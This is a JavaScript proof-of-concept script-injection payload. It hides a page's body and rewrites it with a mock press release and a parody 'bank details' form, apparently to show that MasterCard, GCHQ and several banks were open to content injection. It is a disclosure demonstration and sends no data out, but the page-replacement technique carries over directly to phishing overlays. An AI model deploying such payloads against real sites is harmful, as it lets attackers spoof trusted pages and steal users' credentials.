var releaseSrc = '';
releaseSrc += '<html>';
releaseSrc += '<head><title>Has MasterCard gone on a phishing trip, leaving the back door wide open?</title></head>';
releaseSrc += '<body style=\"margin:10px;\">';
releaseSrc += '<div style=\"background-color:#FFF;\">';
releaseSrc += '<img src=\"http://www.gchq.gov.uk/images/logo_100.gif\"><br><br>';
releaseSrc += '</div>';
releaseSrc += '<div style=\"padding:20px; FONT: 12px arial,helvetica,geneva;\">';
releaseSrc += '<br>';

releaseSrc += '<form action=\"http://www.antiphishing.org/\">';
releaseSrc += '<table style=\"font:8pt arial;border:solid 1px #888;float:right;\">';
releaseSrc += '<tr><td colspan=\"2\"><b>Tell Me all your bank details</b></td></tr>';
releaseSrc += '<tr><td>Inside leg measurement:</td><td><input type=\"text\"></td></tr>';
releaseSrc += '<tr><td>Mothers Maiden Name:</td><td><input type="text"></td></tr>';
releaseSrc += '<tr><td>Weasel:</td><td><select>';
releaseSrc += '<option>Mustela nivalis</option>';
releaseSrc += '<option>Mustela frenata</option>';
releaseSrc += '<option>Mustela erminea</option>';
releaseSrc += '<option>Mustela africana</option>';
releaseSrc += '<option>Mustela vison</option>';
releaseSrc += '</select></td></tr>';
releaseSrc += '<tr><td></td><td><input type=\"submit\" value=\"Update\"></td></tr>';
releaseSrc += '</table></form>';

//releasestart
releaseSrc += '<p style=\"font-size:14pt;font-weight:bold;\">Has MasterCard gone on a phishing trip, leaving the back door wide open?</p>'; 
releaseSrc += '<p>In the wake of MasterCard and NameProtect’s recent PR hype announcing their aggressive drive to fight fraud on the web, this dynamic duo seem to have missed some all too basic gaps in their own security.</p>';
releaseSrc += '<p>Along with their colleagues at Natwest, Barclaycard, WorldPay, Nochex and even the GCHQ, not to mention an almost endless list of further high profile sites, MasterCard have still left chinks in the armour of their own site.</p>';
releaseSrc += '<p>The oversight of some basic security flaws allow hackers to send a user to the site while displaying any content and functionality of the hacker’s choice.</p>';
releaseSrc += '<p>To see this press release in full visit <a href=\"http://www.zapthedingbat.com/security/scriptinjection/\">http://www.zapthedingbat.com/security/scriptinjection/</a></p>';
//releaseend
releaseSrc += '</div>';
releaseSrc += '</body>';
releaseSrc += '</html>';

document.body.style.display='none';
window.onload = function () {
    	while (document.body.childNodes.length > 0) 
	document.body.removeChild(document.body.childNodes[0]);
	document.write(releaseSrc);
}


